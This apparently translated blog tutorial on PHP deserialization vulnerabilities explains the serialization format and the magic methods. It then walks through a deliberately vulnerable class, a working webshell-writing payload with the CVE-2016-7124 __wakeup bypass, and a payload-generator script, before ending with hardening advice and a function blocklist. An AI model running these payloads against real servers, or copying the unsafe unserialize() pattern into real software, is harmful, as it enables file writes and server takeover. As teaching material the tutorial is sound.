Deserialization Vulnerability (PHP)

0x01. What are serialization and deserialization?

Serialization: the process of converting a variable (including an object) into a string that can be stored or transmitted;
Deserialization: converting that serialized string back into the original variable so it can be used again;
Purpose: data can be stored and transmitted conveniently, and the program stays easy to maintain.

0x02. Why is there serialization?

Serialization is the process of storing or passing values in PHP without losing their type and structure: an array stays an array, an object stays an instance of its class, with all of its properties.

0x03. Serialization and deserialization code examples

<?php
class User
{
    public $username = 'admin';
    public $password = '123456';
}

// Serialization
$user = new User();
$str_ser = serialize($user);
echo "Serialized result:\n";
var_dump($str_ser);

// Deserialization
echo "Deserialized result:\n";
$str_uns = 'O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";}';
$str = unserialize($str_uns);
var_dump($str);
?>

Running results: serialize() returns the string O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";} and unserialize() turns it back into an object(User) whose two properties hold the original values.

The serialized format reads as follows: O marks an object, 4 is the byte length of the class name, "User" is the class name and 2 is the number of properties. Inside the braces each property is a key/value pair, so s:8:"username" is a string of 8 bytes named username, followed by its value s:5:"admin". Other type markers are i: (integer), b: (boolean), d: (float), a: (array) and N; (null). All lengths are byte lengths, which matters when a payload is edited by hand; property visibility also shows up in the key (a protected property is stored as "\0*\0name", a private one as "\0ClassName\0name").

0x04. Magic method

Magic methods are a feature of object-oriented PHP. They are called automatically by the engine in specific situations, and their names all start with a double underscore; think of them as hooks. With magic methods PHP can also implement overloading (in PHP, "overloading" means dynamically handling properties and methods that are not declared in the class).

1. __construct, __destruct

__construct is called when an object is constructed;
__destruct is called when an object is explicitly destroyed (its last reference dropped) or when the script ends.

2. __get, __set

__set is called when a value is assigned to an inaccessible or non-existent property;
__get is called when an inaccessible or non-existent property is read.

3. __isset, __unset

__isset is called when isset() or empty() is used on an inaccessible or non-existent property;
__unset is called when unset() is used on an inaccessible or non-existent property.

4. __sleep, __wakeup

__sleep is called by serialize(); it returns the names of the properties to store, which is useful when you do not need to persist all the data of a large object;
__wakeup is called by unserialize() and can be used to re-initialise the object (for example to reopen a database connection). Note that __construct is not run on unserialize(): __wakeup is the only initialisation hook that fires.
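The order in which these hooks fire is easiest to see by running them. The following script is an added example (not code from the original post): a small class whose magic methods announce themselves, serialized and deserialized once. The class name Probe and its properties are made up for the demonstration.

```php
<?php
// Added example: which magic methods fire during serialize()/unserialize(),
// and in what order. Class and property names are invented for the demo.
class Probe
{
    public $name = 'probe';
    public $secret = 'do-not-persist';

    public function __construct() { echo "__construct\n"; }

    // Return the list of properties to store; $secret is deliberately dropped.
    public function __sleep()
    {
        echo "__sleep\n";
        return ['name'];
    }

    // Runs on unserialize(); the constructor does NOT run again.
    public function __wakeup() { echo "__wakeup\n"; }

    public function __destruct() { echo "__destruct\n"; }
}

echo "--- serialize ---\n";
$p = new Probe();            // prints __construct
$s = serialize($p);          // prints __sleep
echo $s, "\n";               // O:5:"Probe":1:{s:4:"name";s:5:"probe";}
unset($p);                   // prints __destruct (refcount drops to zero)

echo "--- unserialize ---\n";
$q = unserialize($s);        // prints __wakeup only; no __construct
var_dump($q->secret);        // class default "do-not-persist": it was never in the string
// __destruct for $q prints when the script ends
```

Two things to take from the output: the constructor never runs on unserialize(), so any checks it performs are bypassed, and __destruct runs even for an object that was never "properly" built. Those two facts are what the vulnerability below relies on.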

0x05. Cause of deserialization vulnerability

When the argument passed to unserialize() is user-controlled, an attacker can supply a carefully constructed serialized string. unserialize() instantiates whatever class the string names (any class that is loaded or autoloadable at that point), fills its properties from the string without running the constructor, and then magic methods fire automatically: __wakeup() immediately, __destruct() when the object is destroyed. If those methods do something dangerous with attacker-controlled properties, the result is code execution, an arbitrary file write, or whatever else the method body allows.

0x06. Example of deserialization vulnerability
(1) The test code is as follows:

<?php
header("Content-Type:text/html;charset=utf-8");
class vFREE{
    public $name = 'vFREE';
    public $age = '18';

    // Called automatically by unserialize(); only resets $age.
    function __wakeup(){
        $this->age = "18";
        echo("__wakeup magic method executed<br>");
    }

    // Called when the object is destroyed (here: when the script ends).
    // Writes the attacker-controlled $name into flag.php.
    function __destruct(){
        echo("__destruct magic method executed");
        $path = 'flag.php';
        $file_get = file_put_contents($path, $this->name);
    }
}

// Vulnerable: user input from ?flag= reaches unserialize() unchanged.
$flag = $_GET['flag'];
$unser = unserialize($flag);
?>

Explanation: unserialize() is called outside the class, but when it rebuilds a vFREE object it checks whether the class defines __wakeup and, if so, runs it (otherwise that step is skipped). vFREE does have a __wakeup, but its body only resets $age, so it is of little use to us. __destruct is what matters: it opens flag.php and writes the value of $this->name into it. Because $name comes straight from the serialized string we supply, writing a PHP webshell into it gives us a shell (getshell).

(2) We need to pass a parameter flag whose value is fed to unserialize(), so what we pass must be a serialized string. To get a valid template, serialize a vFREE object ourselves with the following code:

<?php
// Local copy of the target class, used only to produce a well-formed template.
class vFREE{
    public $name = 'vFREE';
    public $age = '18';

    function __wakeup(){
        $this->age = "18";
    }

    function __destruct(){
        $path = 'flag.php';
        $file_get = file_put_contents($path, $this->name);
    }
}

$test = new vFREE();
$str = serialize($test);
var_dump($str);
?>

The serialized result is:
O:5:"vFREE":2:{s:4:"name";s:5:"vFREE";s:3:"age";s:2:"18";}

(3) Bypass the __wakeup method:

To skip __wakeup and go straight to __destruct, tamper with the declared property count in the serialized string. The class has 2 properties, so the template says :2:; declaring a count larger than the real number (5 here) makes PHP skip __wakeup while still creating the object, so __destruct fires when the script ends. Replacing the value of name with a webshell gives the payload:

O:5:"vFREE":5:{s:4:"name";s:18:"<?php phpinfo();?>";s:3:"age";s:2:"18";}

Note that s:18 is the byte length of the new value; a wrong length makes unserialize() fail. Two caveats. First, in this particular class __wakeup only resets $age and never touches $name, so the write would succeed even with the original count of 2; the count trick matters on targets whose __wakeup sanitises the dangerous property. Second, the trick is CVE-2016-7124, fixed in PHP 5.6.25 and 7.0.10: on patched versions a mismatched count makes unserialize() fail and return false, and the half-built object is discarded without running __wakeup or __destruct.

(4) Pass in the malicious payload and flag.php is created

Request the page with the payload in the flag parameter. URL-encode it first: characters such as <, ?, ", ; and { are not safe in a query string and would be mangled otherwise. The response shows the __destruct message (and, with the bypass working, no __wakeup message), and flag.php appears next to the script.

(5) Check the generated flag.php

Opening flag.php in the browser runs the written <?php phpinfo();?>, confirming that the attacker controls the content of a file executed by the server.
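Steps (2) to (5) can be collapsed into one script. The code below is an added example (not from the original post): it builds the serialized string by hand, so a payload can be produced for a class we do not have locally, and it shows the declared-count tweak from step (3) as an explicit option. The class name vFREE, the property names and the phpinfo() shell are the ones used above; the helper only handles public string properties, which is enough for this target.

```php
<?php
// Added example: hand-build a serialized PHP object for a target class.
// Only public string properties are handled (sufficient for vFREE).
function php_serialize_object(string $class, array $props, ?int $declaredCount = null): string
{
    $body = '';
    foreach ($props as $name => $value) {
        // Lengths are byte lengths, not character counts: strlen(), never mb_strlen().
        $body .= sprintf('s:%d:"%s";s:%d:"%s";', strlen($name), $name, strlen($value), $value);
    }
    // Normally the count must equal the number of properties. A count larger
    // than the real number is the CVE-2016-7124 trick (PHP < 5.6.25 / < 7.0.10):
    // the object is still created but __wakeup() is skipped.
    $count = $declaredCount ?? count($props);
    return sprintf('O:%d:"%s":%d:{%s}', strlen($class), $class, $count, $body);
}

$shell = '<?php phpinfo();?>';
$props = ['name' => $shell, 'age' => '18'];

$normal = php_serialize_object('vFREE', $props);
$bypass = php_serialize_object('vFREE', $props, 5);

echo $normal, "\n";
// O:5:"vFREE":2:{s:4:"name";s:18:"<?php phpinfo();?>";s:3:"age";s:2:"18";}
echo $bypass, "\n";
// O:5:"vFREE":5:{s:4:"name";s:18:"<?php phpinfo();?>";s:3:"age";s:2:"18";}

// The payload travels in a query string, so it must be URL-encoded;
// '<', '?', ';', '"' and '{' would otherwise be mangled by the client or server.
echo '?flag=', urlencode($bypass), "\n";
```

On a patched PHP use $normal: the write still happens here because __wakeup never touches $name. Use $bypass only when the target's __wakeup resets the property you need and the server runs a version affected by CVE-2016-7124.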

0x07. Deserialization vulnerability prevention

(1) Harden the PHP configuration
php.ini has a disable_functions directive that blacklists PHP functions; servers use it to block the command-execution functions:
 # forbid these functions so PHP cannot run system commands
Example: disable_functions = system,passthru,shell_exec,exec,popen
This is defence in depth only: the example above needs none of these functions, file_put_contents() alone is enough to drop a webshell.

(2) Strictly control what reaches unserialize(), and be careful with magic methods
Never pass user-controlled input to unserialize(). Use json_decode() for untrusted data; if serialize() must be kept, authenticate the string (for example an HMAC verified with hash_equals()) before deserializing it, and pass ['allowed_classes' => false] (PHP 7.0+) so that no class can be instantiated from it. Keep __wakeup() and __destruct() free of side effects on properties an attacker could control.
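The following script is an added example (not code from the original post) that puts the vulnerable handler next to three hardened alternatives and feeds each the payload from 0x06. The function names, the SIGNING_KEY placeholder and the token format (hex HMAC, a dot, base64 data) are choices made for this illustration; the payload and class name vFREE come from the post.

```php
<?php
// Added example: vulnerable unserialize() handler beside hardened variants.
// SIGNING_KEY is a placeholder; load a real random secret from configuration.

// 1) Vulnerable: attacker-controlled string reaches unserialize() unchanged,
//    so any loaded class can be instantiated and its magic methods run.
function handle_vulnerable(string $input)
{
    return unserialize($input);
}

// 2) Refuse objects entirely (PHP >= 7.0). Scalars and arrays still decode;
//    any object becomes __PHP_Incomplete_Class and no magic method of the
//    named class is ever invoked.
function handle_no_objects(string $input)
{
    return unserialize($input, ['allowed_classes' => false]);
}

// 3) Use a data format that cannot name classes at all.
function handle_json(string $input)
{
    return json_decode($input, true);   // null on malformed input
}

// 4) Keep serialize() only for data the server produced itself: sign it,
//    and refuse to unserialize anything whose signature does not verify.
const SIGNING_KEY = 'replace-with-a-random-secret-from-config';   // placeholder

function sign(string $data): string
{
    return hash_hmac('sha256', $data, SIGNING_KEY) . '.' . base64_encode($data);
}

function handle_signed(string $token)
{
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) {
        return null;                                   // not a token we issued
    }
    [$mac, $b64] = $parts;
    $data = base64_decode($b64, true);
    if ($data === false || !hash_equals(hash_hmac('sha256', $data, SIGNING_KEY), $mac)) {
        return null;                                   // tampered or forged: never unserialize
    }
    // Even verified data gets the object ban; the signature protects integrity,
    // allowed_classes removes the gadget surface if the key ever leaks.
    return unserialize($data, ['allowed_classes' => false]);
}

$payload = 'O:5:"vFREE":2:{s:4:"name";s:18:"<?php phpinfo();?>";s:3:"age";s:2:"18";}';

var_dump(handle_no_objects($payload));   // object(__PHP_Incomplete_Class): no __wakeup/__destruct of vFREE
var_dump(handle_json($payload));         // NULL: not JSON
var_dump(handle_signed($payload));       // NULL: no valid signature
var_dump(handle_signed(sign(serialize(['age' => 18]))));   // array(1) { ["age"]=> int(18) }
```

Of the three, json_decode() is the right default for new code; allowed_classes and signing are for systems that already store serialized PHP data and cannot change the format quickly.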

Origin blog.csdn.net/qq_42383069/article/details/124841251